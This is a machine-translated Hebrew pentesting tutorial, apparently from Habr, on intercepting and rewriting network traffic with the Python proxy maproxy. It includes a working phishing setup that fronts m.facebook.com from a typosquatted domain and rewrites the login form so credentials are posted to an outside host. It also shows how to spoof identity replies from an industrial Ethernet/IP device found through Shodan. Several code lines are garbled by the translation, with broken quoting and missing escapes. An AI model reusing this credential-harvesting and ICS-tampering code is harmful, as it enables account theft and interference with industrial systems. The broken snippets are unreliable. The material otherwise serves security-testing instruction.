עיבוד נתוני רשת תוך כדי תנועה

תרגום המאמר הוכן ערב תחילת הקורס "פנטסט. תרגול בדיקת חדירה".

תקציר

מגוון סוגים של הערכות אבטחה, החל מבדיקות חדירה רגילות ופעולות Red Team לפריצה למכשירי IoT/ICS ו-SCADA, כרוכים בעבודה עם פרוטוקולי רשת בינארים, כלומר בעצם יירוט ושינוי נתוני הרשת בין הלקוח למטרה. רחרוח תעבורת רשת אינה משימה קשה מכיוון שיש לנו כלים כמו Wireshark, Tcpdump או Scapy, אך נראה כי שינוי הוא משימה עתירת עבודה מכיוון שנצטרך לקבל איזשהו ממשק כדי לקרוא את נתוני הרשת, לסנן אותם, לשנות אותם. אותו תוך כדי תנועה ושלח אותו בחזרה למארח היעד כמעט בזמן אמת. בנוסף, זה יהיה אידיאלי אם כלי כזה יוכל לעבוד אוטומטית עם מספר חיבורים מקבילים וניתן להתאמה אישית באמצעות סקריפטים.

יום אחד גיליתי כלי שנקרא maproxy, התיעוד הבהיר לי את זה במהירות maproxy - בדיוק מה שאני צריך. זהו פרוקסי TCP פשוט למדי, רב תכליתי וניתן להגדרה בקלות. בדקתי את הכלי הזה בכמה יישומים מורכבים למדי, כולל התקני ICS (שיוצרים הרבה מנות) כדי לראות אם הוא יכול להתמודד עם הרבה חיבורים מקבילים, והכלי פעל היטב.

מאמר זה יציג בפניכם עיבוד נתוני רשת תוך כדי שימוש maproxy.

סקירה

כלי maproxy מבוסס על Tornado, מסגרת רשת אסינכרונית פופולרית ובוגרת ב- Python.

באופן כללי, זה יכול לפעול במספר מצבים:

• TCP:TCP - חיבורי TCP לא מוצפנים;
• TCP:SSL и SSL:TCP - עם הצפנה חד כיוונית;
• SSL:SSL - הצפנה דו כיוונית.

זה מגיע בתור ספרייה. להתחלה מהירה, אתה יכול להשתמש בקבצים לדוגמה המשקפים את הראשי פונקציות הספרייה:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

מקרה 1 - פרוקסי דו-כיווני פשוט

מבוסס על tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

ברירת מחדל ProxyServer() לוקח שני ארגומנטים - מיקום החיבור ויציאת היעד. server.listen() לוקח ארגומנט אחד - היציאה להאזנה לחיבור הנכנס.

ביצוע הסקריפט:

# python tcp2tcp.py

על מנת להפעיל את הבדיקה, אנו הולכים להתחבר לשרת SSH מקומי באמצעות סקריפט ה-proxy שלנו, שמאזין ב- 2222/tcp יציאה ומתחבר ליציאה רגילה 22/tcp שרתי SSH:

באנר הפתיחה מודיע לך שהסקריפט לדוגמה שלנו ביצע בהצלחה את תעבורת הרשת.

מקרה 2 - שינוי נתונים

עוד תסריט הדגמה logging_proxy.py אידיאלי לאינטראקציה עם נתוני רשת. ההערות בקובץ מתארות את שיטות הכיתה שאתה יכול לשנות כדי להשיג את המטרה שלך:

הדבר המעניין ביותר נמצא כאן:

• on_c2p_done_read - ליירט נתונים לאורך הדרך מהלקוח לשרת;
• on_p2s_done_read - הפוך.

בוא ננסה לשנות את הבאנר SSH שהשרת מחזיר ללקוח:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

בצע את הסקריפט:

כפי שאתה יכול לראות, הלקוח הוטעה כי שם שרת SSH עבורו שונה ל «DumnySSH».

מקרה 3 - דף אינטרנט פשוט של פישינג

יש אינסוף דרכים להשתמש בכלי זה. הפעם בואו נתמקד במשהו מעשי יותר מהצד המבצעי של הצוות האדום. בואו נחקה את דף הנחיתה m.facebook.com ולהשתמש בדומיין מותאם אישית עם שגיאת הקלדה מכוונת, למשל, m.facebok.com. למטרות הדגמה, נניח שהדומיין רשום על ידינו.

אנחנו הולכים ליצור חיבור רשת לא מוצפן עם ה-proxy של הקורבנות שלנו ו-SSL Stream לשרת פייסבוק (31.13.81.36). כדי שהדוגמה הזו תעבוד, אנחנו צריכים להחליף את כותרת המארח של HTTP ולהחדיר את שם המארח הנכון, וגם נשבית את דחיסת התגובה כדי שנוכל לגשת בקלות לתוכן. בסופו של דבר נחליף את טופס ה-HTML כך שאישורי הכניסה יישלחו אלינו במקום לשרתים של פייסבוק:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/iw/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

לסיכום:

כפי שאתה יכול לראות, הצלחנו להחליף את האתר המקורי בהצלחה.

מקרה 4 - העברת Ethernet/IP

אני מתעסק עם התקנים ותוכנות תעשייתיות (ICS/SCADA) כבר לא מעט זמן, כמו בקרים ניתנים לתכנות (PLC), מודולי I/O, כוננים, ממסרים, סביבות תכנות סולם ועוד רבים. המארז הזה מיועד למי שאוהב דברים תעשייתיים. פריצה לפתרונות כאלה כרוכה במשחק פעיל עם פרוטוקולי רשת. בדוגמה הבאה, ברצוני להראות כיצד ניתן לשנות תעבורת רשת ICS/SCADA.

כדי לעשות זאת, אתה צריך את הדברים הבאים:

• רשת סניפר, למשל, Wireshark;
• Ethernet/IP או רק התקן SIP, אתה יכול למצוא אותו באמצעות שירות Shodan;
• התסריט שלנו מבוסס על maproxy.

ראשית, בואו נסתכל כיצד נראית תגובת זיהוי טיפוסית מ-CIP (פרוטוקול תעשייתי משותף):

זיהוי ההתקן מתבצע באמצעות פרוטוקול Ethernet/IP, שהוא גרסה משופרת של פרוטוקול ה-Ethernet התעשייתי העוטף פרוטוקולי בקרה כגון CIP. אנו הולכים לשנות את שם המזהה המודגש אשר גלוי בצילום המסך "NI-IndComm עבור Ethernet" באמצעות סקריפט ה-proxy שלנו. נוכל לעשות שימוש חוזר בתסריט logging_proxy.py ובאופן דומה לשנות את שיטת המחלקה on_p2s_done_read, כי אנחנו רוצים ששם זהות שונה יהיה גלוי על הלקוח.

קוד:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

בעיקרו של דבר, ביקשנו זיהוי המכשיר פעמיים, התגובה השנייה הייתה המקורית, והראשונה שונתה תוך כדי תנועה.

והאחרון

לדעתי maproxy כלי נוח ופשוט, שכתוב גם ב-Python, כך שאני מאמין שגם אתם יכולים להפיק תועלת מהשימוש בו. כמובן, ישנם כלים מורכבים יותר לעיבוד ושינוי נתוני רשת, אך הם גם דורשים יותר תשומת לב ולרוב נוצרים עבור מקרה שימוש ספציפי, למשל. מוראנה, מודלישקה או evilginx למקרים דומים לשלישי, או סַפָּה למקרה האחרון. כך או אחרת, בעזרתו maproxy אתה יכול ליישם במהירות את הרעיונות שלך ליירוט נתוני רשת, מכיוון שהסקריפטים לדוגמה ברורים מאוד.

בדיקת מנגנוני אימות ב-Windows AD

מקור: www.habr.com